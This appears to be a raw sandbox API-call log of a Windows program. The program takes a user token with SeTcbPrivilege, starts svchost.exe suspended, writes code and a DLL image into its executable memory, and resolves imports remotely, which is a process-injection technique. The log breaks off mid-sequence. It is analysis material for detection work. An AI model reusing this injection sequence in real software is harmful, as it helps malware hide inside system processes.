	[0154.955] GetStartupInfoW (in: lpStartupInfo=0x1284dc | out: lpStartupInfo=0x1284dc*(cb=0x44, lpReserved="", lpDesktop="", lpTitle="taskeng.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x81, wShowWindow=0x4, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1d68c8, hStdOutput=0x2307960, hStdError=0x1d6c70)) 
	[0154.955] GetCurrentProcess () returned 0xffffffff
	[0154.955] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x28, TokenHandle=0x1285ac | out: TokenHandle=0x1285ac*=0x488) returned 1
	[0154.955] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeTcbPrivilege", lpLuid=0x128568 | out: lpLuid=0x128568*(LowPart=0x7, HighPart=0)) returned 1
	[0154.956] AdjustTokenPrivileges (in: TokenHandle=0x488, DisableAllPrivileges=0, NewState=0x128564*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x7, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x10, PreviousState=0x128520, ReturnLength=0x128578 | out: PreviousState=0x128520, ReturnLength=0x128578) returned 1
	[0154.956] WTSEnumerateSessionsA (in: hServer=0x0, Reserved=0x0, Version=0x1, ppSessionInfo=0x12857c, pCount=0x12858c | out: ppSessionInfo=0x12857c, pCount=0x12858c) returned 1
	[0154.957] WTSFreeMemory (pMemory=0x22a5ee0) 
	[0154.957] RevertToSelf () returned 1
	[0154.957] WTSQueryUserToken (SessionId=0x1, phToken=0x12859c*=0xffffffff) returned 1
	[0154.957] DuplicateTokenEx (in: hExistingToken=0x48c, dwDesiredAccess=0x2000000, lpTokenAttributes=0x0, ImpersonationLevel=0x1, TokenType=0x1, phNewToken=0x1285b0 | out: phNewToken=0x1285b0*=0x484) returned 1
	[0154.958] CloseHandle (hObject=0x48c) returned 1
	[0154.958] GetTokenInformation (in: TokenHandle=0x484, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x1285a8 | out: TokenInformation=0x0, ReturnLength=0x1285a8) returned 0
	[0154.958] GetLastError () returned 0x7a
	[0154.958] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x30) returned 0x22a5ee0
	[0154.958] GetTokenInformation (in: TokenHandle=0x484, TokenInformationClass=0x1, TokenInformation=0x22a5ee0, TokenInformationLength=0x24, ReturnLength=0x1285a8 | out: TokenInformation=0x22a5ee0, ReturnLength=0x1285a8) returned 1
	[0154.958] LookupAccountSidW (in: lpSystemName=0x0, Sid=0x22a5ee8*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0xb)), Name=0x1281c8, cchName=0x128588, ReferencedDomainName=0x127fc8, cchReferencedDomainName=0x128588, peUse=0x128560 | out: Name="2XC7u663GxWc", cchName=0x128588, ReferencedDomainName="ZGW5TDPU", cchReferencedDomainName=0x128588, peUse=0x128560) returned 1
	[0154.958] LoadUserProfileW () returned 0x1
	[0154.965] CreateEnvironmentBlock () returned 0x1
	[0154.968] CreateProcessAsUserW (in: hToken=0x484, lpApplicationName=0x0, lpCommandLine="svchost.exe", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x8000424, lpEnvironment=0x2732590, lpCurrentDirectory=0x0, lpStartupInfo=0x1284dc*(cb=0x44, lpReserved="", lpDesktop="winsta0\\default", lpTitle="taskeng.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x81, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1d68c8, hStdOutput=0x2307960, hStdError=0x1d6c70), lpProcessInformation=0x128550 | out: lpCommandLine="svchost.exe", lpProcessInformation=0x128550*(hProcess=0x494, hThread=0x490, dwProcessId=0xa60, dwThreadId=0xa94)) returned 1
	[0154.973] UnloadUserProfile () returned 0x1
	[0154.976] CloseHandle (hObject=0x484) returned 1
	[0154.976] DestroyEnvironmentBlock () returned 0x1
	[0154.976] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22a5ee0) returned 1
	[0154.976] AdjustTokenPrivileges (in: TokenHandle=0x488, DisableAllPrivileges=0, NewState=0x128520, BufferLength=0x10, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1
	[0154.976] CloseHandle (hObject=0x488) returned 1
	[0154.976] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2307960) returned 1
	[0154.976] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2307960
	[0154.976] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x488
	[0154.976] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x484
	[0154.976] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=1, lpName=0x0) returned 0x48c
	[0154.976] GetCurrentProcess () returned 0xffffffff
	[0154.976] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x488, hTargetProcessHandle=0x494, lpTargetHandle=0x128628, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x128628*=0x4) returned 1
	[0154.976] GetCurrentProcess () returned 0xffffffff
	[0154.976] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x484, hTargetProcessHandle=0x494, lpTargetHandle=0x12862c, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x12862c*=0x8) returned 1
	[0154.976] GetCurrentProcess () returned 0xffffffff
	[0154.976] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x48c, hTargetProcessHandle=0x494, lpTargetHandle=0x128630, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x128630*=0xc) returned 1
	[0154.976] VirtualAllocEx (hProcess=0x494, lpAddress=0x0, dwSize=0x16f, flAllocationType=0x3000, flProtect=0x40) returned 0x50000
	[0154.976] WriteProcessMemory (in: hProcess=0x494, lpBaseAddress=0x50000, lpBuffer=0xd712d0*, nSize=0x16f, lpNumberOfBytesWritten=0x1284d4 | out: lpBuffer=0xd712d0*, lpNumberOfBytesWritten=0x1284d4*=0x16f) returned 1
	[0154.977] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0154.977] GetProcAddress (hModule=0x76b10000, lpProcName="SignalObjectAndWait") returned 0x76b761d9
	[0154.977] GetProcAddress (hModule=0x76b10000, lpProcName="WaitForSingleObject") returned 0x76b5ba90
	[0154.977] GetProcAddress (hModule=0x76b10000, lpProcName="CloseHandle") returned 0x76b5ca7c
	[0154.977] GetProcAddress (hModule=0x76b10000, lpProcName="ResetEvent") returned 0x76b5bcb4
	[0154.978] GetProcAddress (hModule=0x76b10000, lpProcName="ExitProcess") returned 0x76b6214f
	[0154.978] GetProcAddress (hModule=0x76b10000, lpProcName="InitializeCriticalSection") returned 0x7738a149
	[0154.978] GetProcAddress (hModule=0x76b10000, lpProcName="EnterCriticalSection") returned 0x773777a0
	[0154.978] GetProcAddress (hModule=0x76b10000, lpProcName="LeaveCriticalSection") returned 0x77377760
	[0154.978] VirtualAllocEx (hProcess=0x494, lpAddress=0x0, dwSize=0x70, flAllocationType=0x3000, flProtect=0x40) returned 0x60000
	[0154.978] WriteProcessMemory (in: hProcess=0x494, lpBaseAddress=0x60000, lpBuffer=0x128628*, nSize=0x70, lpNumberOfBytesWritten=0x1284d4 | out: lpBuffer=0x128628*, lpNumberOfBytesWritten=0x1284d4*=0x70) returned 1
	[0154.978] NtQueryInformationProcess (in: ProcessHandle=0x494, ProcessInformationClass=0x0, ProcessInformation=0x1284bc, ProcessInformationLength=0x18, ReturnLength=0x0 | out: ProcessInformation=0x1284bc, ReturnLength=0x0) returned 0x0
	[0154.978] ReadProcessMemory (in: hProcess=0x494, lpBaseAddress=0x7ffdd000, lpBuffer=0x1284d4, nSize=0x10, lpNumberOfBytesRead=0x128360 | out: lpBuffer=0x1284d4*, lpNumberOfBytesRead=0x128360*=0x10) returned 1
	[0154.979] ReadProcessMemory (in: hProcess=0x494, lpBaseAddress=0x600000, lpBuffer=0x12847c, nSize=0x40, lpNumberOfBytesRead=0x128360 | out: lpBuffer=0x12847c*, lpNumberOfBytesRead=0x128360*=0x40) returned 1
	[0154.979] ReadProcessMemory (in: hProcess=0x494, lpBaseAddress=0x6000d8, lpBuffer=0x128384, nSize=0xf8, lpNumberOfBytesRead=0x128360 | out: lpBuffer=0x128384*, lpNumberOfBytesRead=0x128360*=0xf8) returned 1
	[0154.979] WriteProcessMemory (in: hProcess=0x494, lpBaseAddress=0x602104, lpBuffer=0x128698*, nSize=0xc, lpNumberOfBytesWritten=0x1284d4 | out: lpBuffer=0x128698*, lpNumberOfBytesWritten=0x1284d4*=0xc) returned 1
	[0154.979] ResetEvent (hEvent=0x484) returned 1
	[0154.979] ResetEvent (hEvent=0x488) returned 1
	[0154.979] ResumeThread (hThread=0x490) returned 0x1
	[0154.991] SignalObjectAndWait (hObjectToSignal=0x484, hObjectToWaitOn=0x488, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0154.991] VirtualAllocEx (hProcess=0x494, lpAddress=0x10000000, dwSize=0x7000, flAllocationType=0x2000, flProtect=0x40) returned 0x10000000
	[0154.992] VirtualAllocEx (hProcess=0x494, lpAddress=0x10000000, dwSize=0x400, flAllocationType=0x1000, flProtect=0x4) returned 0x10000000
	[0154.992] WriteProcessMemory (in: hProcess=0x494, lpBaseAddress=0x10000000, lpBuffer=0x26c8c38*, nSize=0x400, lpNumberOfBytesWritten=0x1285fc | out: lpBuffer=0x26c8c38*, lpNumberOfBytesWritten=0x1285fc*=0x400) returned 1
	[0154.992] VirtualProtectEx (in: hProcess=0x494, lpAddress=0x10000000, dwSize=0x400, flNewProtect=0x2, lpflOldProtect=0x1285fc | out: lpflOldProtect=0x1285fc*=0x4) returned 1
	[0154.992] VirtualAllocEx (hProcess=0x494, lpAddress=0x10001000, dwSize=0x2800, flAllocationType=0x1000, flProtect=0x4) returned 0x10001000
	[0154.992] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x2800) returned 0x22d3cc0
	[0154.992] WriteProcessMemory (in: hProcess=0x494, lpBaseAddress=0x10001000, lpBuffer=0x22d3cc0*, nSize=0x2800, lpNumberOfBytesWritten=0x1285e8 | out: lpBuffer=0x22d3cc0*, lpNumberOfBytesWritten=0x1285e8*=0x2800) returned 1
	[0154.993] WriteProcessMemory (in: hProcess=0x494, lpBaseAddress=0x10001000, lpBuffer=0x26c9038*, nSize=0x2800, lpNumberOfBytesWritten=0x1285fc | out: lpBuffer=0x26c9038*, lpNumberOfBytesWritten=0x1285fc*=0x2800) returned 1
	[0154.993] VirtualAllocEx (hProcess=0x494, lpAddress=0x10004000, dwSize=0xe00, flAllocationType=0x1000, flProtect=0x4) returned 0x10004000
	[0154.994] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x22d3cc0, Size=0xe00) returned 0x22d3cc0
	[0154.994] WriteProcessMemory (in: hProcess=0x494, lpBaseAddress=0x10004000, lpBuffer=0x22d3cc0*, nSize=0xe00, lpNumberOfBytesWritten=0x1285e8 | out: lpBuffer=0x22d3cc0*, lpNumberOfBytesWritten=0x1285e8*=0xe00) returned 1
	[0154.994] WriteProcessMemory (in: hProcess=0x494, lpBaseAddress=0x10004000, lpBuffer=0x26cb838*, nSize=0xe00, lpNumberOfBytesWritten=0x1285fc | out: lpBuffer=0x26cb838*, lpNumberOfBytesWritten=0x1285fc*=0xe00) returned 1
	[0154.994] VirtualAllocEx (hProcess=0x494, lpAddress=0x10005000, dwSize=0x3ec, flAllocationType=0x1000, flProtect=0x4) returned 0x10005000
	[0154.994] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x22d3cc0, Size=0x3f0) returned 0x22d3cc0
	[0154.994] WriteProcessMemory (in: hProcess=0x494, lpBaseAddress=0x10005000, lpBuffer=0x22d3cc0*, nSize=0x3ec, lpNumberOfBytesWritten=0x1285e8 | out: lpBuffer=0x22d3cc0*, lpNumberOfBytesWritten=0x1285e8*=0x3ec) returned 1
	[0154.995] WriteProcessMemory (in: hProcess=0x494, lpBaseAddress=0x10005000, lpBuffer=0x26cc638*, nSize=0x200, lpNumberOfBytesWritten=0x1285fc | out: lpBuffer=0x26cc638*, lpNumberOfBytesWritten=0x1285fc*=0x200) returned 1
	[0154.995] VirtualAllocEx (hProcess=0x494, lpAddress=0x10006000, dwSize=0x400, flAllocationType=0x1000, flProtect=0x4) returned 0x10006000
	[0154.995] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x22d3cc0, Size=0x400) returned 0x22d3cc0
	[0154.995] WriteProcessMemory (in: hProcess=0x494, lpBaseAddress=0x10006000, lpBuffer=0x22d3cc0*, nSize=0x400, lpNumberOfBytesWritten=0x1285e8 | out: lpBuffer=0x22d3cc0*, lpNumberOfBytesWritten=0x1285e8*=0x400) returned 1
	[0154.996] WriteProcessMemory (in: hProcess=0x494, lpBaseAddress=0x10006000, lpBuffer=0x26cc838*, nSize=0x400, lpNumberOfBytesWritten=0x1285fc | out: lpBuffer=0x26cc838*, lpNumberOfBytesWritten=0x1285fc*=0x400) returned 1
	[0154.996] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0154.996] GetProcAddress (hModule=0x76b10000, lpProcName="LoadLibraryW") returned 0x76b63c01
	[0154.996] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x26cc260, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 13
	[0154.996] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23078e8
	[0154.996] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x26cc260, cbMultiByte=-1, lpWideCharStr=0x23078e8, cchWideChar=13 | out: lpWideCharStr="KERNEL32.dll") returned 13
	[0154.996] lstrlenW (lpString="KERNEL32.dll") returned 12
	[0154.996] VirtualAllocEx (hProcess=0x494, lpAddress=0x0, dwSize=0x1a, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0154.996] WriteProcessMemory (in: hProcess=0x494, lpBaseAddress=0x20000, lpBuffer=0x23078e8*, nSize=0x1a, lpNumberOfBytesWritten=0x128494 | out: lpBuffer=0x23078e8*, lpNumberOfBytesWritten=0x128494*=0x1a) returned 1
	[0154.997] ReadProcessMemory (in: hProcess=0x494, lpBaseAddress=0x60000, lpBuffer=0x128438, nSize=0x70, lpNumberOfBytesRead=0x128418 | out: lpBuffer=0x128438*, lpNumberOfBytesRead=0x128418*=0x70) returned 1
	[0154.997] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad0f0
	[0154.997] VirtualAllocEx (hProcess=0x494, lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x40) returned 0x70000
	[0154.997] WriteProcessMemory (in: hProcess=0x494, lpBaseAddress=0x70000, lpBuffer=0x22ad0f0*, nSize=0xc, lpNumberOfBytesWritten=0x128410 | out: lpBuffer=0x22ad0f0*, lpNumberOfBytesWritten=0x128410*=0xc) returned 1
	[0154.997] WriteProcessMemory (in: hProcess=0x494, lpBaseAddress=0x60000, lpBuffer=0x128438*, nSize=0x70, lpNumberOfBytesWritten=0x128410 | out: lpBuffer=0x128438*, lpNumberOfBytesWritten=0x128410*=0x70) returned 1
	[0154.998] ResetEvent (hEvent=0x488) returned 1
	[0154.998] SignalObjectAndWait (hObjectToSignal=0x484, hObjectToWaitOn=0x488, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0154.998] ReadProcessMemory (in: hProcess=0x494, lpBaseAddress=0x60000, lpBuffer=0x128438, nSize=0x70, lpNumberOfBytesRead=0x128410 | out: lpBuffer=0x128438*, lpNumberOfBytesRead=0x128410*=0x70) returned 1
	[0154.998] VirtualFreeEx (hProcess=0x494, lpAddress=0x70000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0154.998] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad0f0) returned 1
	[0154.998] VirtualFreeEx (hProcess=0x494, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0154.999] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x23078e8) returned 1
	[0154.999] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0154.999] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0154.999] lstrlenA (lpString="GetModuleHandleW") returned 16
	[0154.999] VirtualAllocEx (hProcess=0x494, lpAddress=0x0, dwSize=0x11, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0154.999] WriteProcessMemory (in: hProcess=0x494, lpBaseAddress=0x20000, lpBuffer=0x26cc21c*, nSize=0x11, lpNumberOfBytesWritten=0x128494 | out: lpBuffer=0x26cc21c*, lpNumberOfBytesWritten=0x128494*=0x11) returned 1
	[0154.999] ReadProcessMemory (in: hProcess=0x494, lpBaseAddress=0x60000, lpBuffer=0x128434, nSize=0x70, lpNumberOfBytesRead=0x128414 | out: lpBuffer=0x128434*, lpNumberOfBytesRead=0x128414*=0x70) returned 1
	[0154.999] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad0f0
	[0155.000] VirtualAllocEx (hProcess=0x494, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0x70000
	[0155.000] WriteProcessMemory (in: hProcess=0x494, lpBaseAddress=0x70000, lpBuffer=0x22ad0f0*, nSize=0x10, lpNumberOfBytesWritten=0x12840c | out: lpBuffer=0x22ad0f0*, lpNumberOfBytesWritten=0x12840c*=0x10) returned 1
	[0155.000] WriteProcessMemory (in: hProcess=0x494, lpBaseAddress=0x60000, lpBuffer=0x128434*, nSize=0x70, lpNumberOfBytesWritten=0x12840c | out: lpBuffer=0x128434*, lpNumberOfBytesWritten=0x12840c*=0x70) returned 1
	[0155.000] ResetEvent (hEvent=0x488) returned 1
	[0155.000] SignalObjectAndWait (hObjectToSignal=0x484, hObjectToWaitOn=0x488, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0155.001] ReadProcessMemory (in: hProcess=0x494, lpBaseAddress=0x60000, lpBuffer=0x128434, nSize=0x70, lpNumberOfBytesRead=0x12840c | out: lpBuffer=0x128434*, lpNumberOfBytesRead=0x12840c*=0x70) returned 1
	[0155.001] VirtualFreeEx (hProcess=0x494, lpAddress=0x70000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0155.001] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad0f0) returned 1
	[0155.001] VirtualFreeEx (hProcess=0x494, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0155.001] WriteProcessMemory (in: hProcess=0x494, lpBaseAddress=0x10004018, lpBuffer=0x1286b4*, nSize=0x4, lpNumberOfBytesWritten=0x1285fc | out: lpBuffer=0x1286b4*, lpNumberOfBytesWritten=0x1285fc*=0x4) returned 1
	[0155.001] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0155.001] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0155.002] lstrlenA (lpString="GetVersionExW") returned 13
	[0155.002] VirtualAllocEx (hProcess=0x494, lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0155.002] WriteProcessMemory (in: hProcess=0x494, lpBaseAddress=0x20000, lpBuffer=0x26cc230*, nSize=0xe, lpNumberOfBytesWritten=0x128494 | out: lpBuffer=0x26cc230*, lpNumberOfBytesWritten=0x128494*=0xe) returned 1
	[0155.002] ReadProcessMemory (in: hProcess=0x494, lpBaseAddress=0x60000, lpBuffer=0x128434, nSize=0x70, lpNumberOfBytesRead=0x128414 | out: lpBuffer=0x128434*, lpNumberOfBytesRead=0x128414*=0x70) returned 1
	[0155.002] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad0f0
	[0155.002] VirtualAllocEx (hProcess=0x494, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0x70000
	[0155.002] WriteProcessMemory (in: hProcess=0x494, lpBaseAddress=0x70000, lpBuffer=0x22ad0f0*, nSize=0x10, lpNumberOfBytesWritten=0x12840c | out: lpBuffer=0x22ad0f0*, lpNumberOfBytesWritten=0x12840c*=0x10) returned 1
	[0155.003] WriteProcessMemory (in: hProcess=0x494, lpBaseAddress=0x60000, lpBuffer=0x128434*, nSize=0x70, lpNumberOfBytesWritten=0x12840c | out: lpBuffer=0x128434*, lpNumberOfBytesWritten=0x12840c*=0x70) returned 1
	[0155.003] ResetEvent (hEvent=0x488) returned 1
	[0155.003] SignalObjectAndWait (hObjectToSignal=0x484, hObjectToWaitOn=0x488, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0155.003] ReadProcessMemory (in: hProcess=0x494, lpBaseAddress=0x60000, lpBuffer=0x128434, nSize=0x70, lpNumberOfBytesRead=0x12840c | out: lpBuffer=0x128434*, lpNumberOfBytesRead=0x12840c*=0x70) returned 1
	[0155.003] VirtualFreeEx (hProcess=0x494, lpAddress=0x70000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0155.003] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad0f0) returned 1
	[0155.003] VirtualFreeEx (hProcess=0x494, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0155.003] WriteProcessMemory (in: hProcess=0x494, lpBaseAddress=0x1000401c, lpBuffer=0x1286b4*, nSize=0x4, lpNumberOfBytesWritten=0x1285fc | out: lpBuffer=0x1286b4*, lpNumberOfBytesWritten=0x1285fc*=0x4) returned 1
	[0155.004] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0155.004] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0155.004] lstrlenA (lpString="GetProcAddress") returned 14
	[0155.004] VirtualAllocEx (hProcess=0x494, lpAddress=0x0, dwSize=0xf, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0155.004] WriteProcessMemory (in: hProcess=0x494, lpBaseAddress=0x20000, lpBuffer=0x26cc20a*, nSize=0xf, lpNumberOfBytesWritten=0x128494 | out: lpBuffer=0x26cc20a*, lpNumberOfBytesWritten=0x128494*=0xf) returned 1
	[0155.004] ReadProcessMemory (in: hProcess=0x494, lpBaseAddress=0x60000, lpBuffer=0x128434, nSize=0x70, lpNumberOfBytesRead=0x128414 | out: lpBuffer=0x128434*, lpNumberOfBytesRead=0x128414*=0x70) returned 1
	[0155.004] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad0f0
	[0155.004] VirtualAllocEx (hProcess=0x494, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0x70000
	[0155.005] WriteProcessMemory (in: hProcess=0x494, lpBaseAddress=0x70000, lpBuffer=0x22ad0f0*, nSize=0x10, lpNumberOfBytesWritten=0x12840c | out: lpBuffer=0x22ad0f0*, lpNumberOfBytesWritten=0x12840c*=0x10) returned 1
	[0155.005] WriteProcessMemory (in: hProcess=0x494, lpBaseAddress=0x60000, lpBuffer=0x128434*, nSize=0x70, lpNumberOfBytesWritten=0x12840c | out: lpBuffer=0x128434*, lpNumberOfBytesWritten=0x12840c*=0x70) returned 1
	[0155.005] ResetEvent (hEvent=0x488) returned 1
	[0155.005] SignalObjectAndWait (hObjectToSignal=0x484, hObjectToWaitOn=0x488, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0155.005] ReadProcessMemory (in: hProcess=0x494, lpBaseAddress=0x60000, lpBuffer=0x128434, nSize=0x70, lpNumberOfBytesRead=0x12840c | out: lpBuffer=0x128434*, lpNumberOfBytesRead=0x12840c*=0x70) returned 1
	[0155.005] VirtualFreeEx (hProcess=0x494, lpAddress=0x70000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0155.006] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad0f0) returned 1
	[0155.006] VirtualFreeEx (hProcess=0x494, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0155.006] WriteProcessMemory (in: hProcess=0x494, lpBaseAddress=0x10004020, lpBuffer=0x1286b4*, nSize=0x4, lpNumberOfBytesWritten=0x1285fc | out: lpBuffer=0x1286b4*, lpNumberOfBytesWritten=0x1285fc*=0x4) returned 1
	[0155.006] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0155.006] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0155.006] lstrlenA (lpString="WideCharToMultiByte") returned 19
	[0155.006] VirtualAllocEx (hProcess=0x494, lpAddress=0x0, dwSize=0x14, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0155.006] WriteProcessMemory (in: hProcess=0x494, lpBaseAddress=0x20000, lpBuffer=0x26cc24c*, nSize=0x14, lpNumberOfBytesWritten=0x128494 | out: lpBuffer=0x26cc24c*, lpNumberOfBytesWritten=0x128494*=0x14) returned 1
	[0155.007] ReadProcessMemory (in: hProcess=0x494, lpBaseAddress=0x60000, lpBuffer=0x128434, nSize=0x70, lpNumberOfBytesRead=0x128414 | out: lpBuffer=0x128434*, lpNumberOfBytesRead=0x128414*=0x70) returned 1
	[0155.007] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad0f0
	[0155.007] VirtualAllocEx (hProcess=0x494, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0x70000
	[0155.007] WriteProcessMemory (in: hProcess=0x494, lpBaseAddress=0x70000, lpBuffer=0x22ad0f0*, nSize=0x10, lpNumberOfBytesWritten=0x12840c | out: lpBuffer=0x22ad0f0*, lpNumberOfBytesWritten=0x12840c*=0x10) returned 1
	[0155.007] WriteProcessMemory (in: hProcess=0x494, lpBaseAddress=0x60000, lpBuffer=0x128434*, nSize=0x70, lpNumberOfBytesWritten=0x12840c | out: lpBuffer=0x128434*, lpNumberOfBytesWritten=0x12840c*=0x70) returned 1
	[0155.007] ResetEvent (hEvent=0x488) returned 1
	[0155.007] SignalObjectAndWait (hObjectToSignal=0x484, hObjectToWaitOn=0x488, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0155.008] ReadProcessMemory (in: hProcess=0x494, lpBaseAddress=0x60000, lpBuffer=0x128434, nSize=0x70, lpNumberOfBytesRead=0x12840c | out: lpBuffer=0x128434*, lpNumberOfBytesRead=0x12840c*=0x70) returned 1
	[0155.008] VirtualFreeEx (hProcess=0x494, lpAddress=0x70000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0155.008] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad0f0) returned 1
	[0155.008] VirtualFreeEx (hProcess=0x494, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0155.008] WriteProcessMemory (in: hProcess=0x494, lpBaseAddress=0x10004024, lpBuffer=0x1286b4*, nSize=0x4, lpNumberOfBytesWritten=0x1285fc | out: lpBuffer=0x1286b4*, lpNumberOfBytesWritten=0x1285fc*=0x4) returned 1
	[0155.008] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0155.008] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0155.008] lstrlenA (lpString="HeapFree") returned 8
	[0155.008] VirtualAllocEx (hProcess=0x494, lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0155.009] WriteProcessMemory (in: hProcess=0x494, lpBaseAddress=0x20000, lpBuffer=0x26cc1fe*, nSize=0x9, lpNumberOfBytesWritten=0x128494 | out: lpBuffer=0x26cc1fe*, lpNumberOfBytesWritten=0x128494*=0x9) returned 1
	[0155.009] ReadProcessMemory (in: hProcess=0x494, lpBaseAddress=0x60000, lpBuffer=0x128434, nSize=0x70, lpNumberOfBytesRead=0x128414 | out: lpBuffer=0x128434*, lpNumberOfBytesRead=0x128414*=0x70) returned 1
	[0155.009] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad0f0
	[0155.009] VirtualAllocEx (hProcess=0x494, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0x70000
	[0155.009] WriteProcessMemory (in: hProcess=0x494, lpBaseAddress=0x70000, lpBuffer=0x22ad0f0*, nSize=0x10, lpNumberOfBytesWritten=0x12840c | out: lpBuffer=0x22ad0f0*, lpNumberOfBytesWritten=0x12840c*=0x10) returned 1
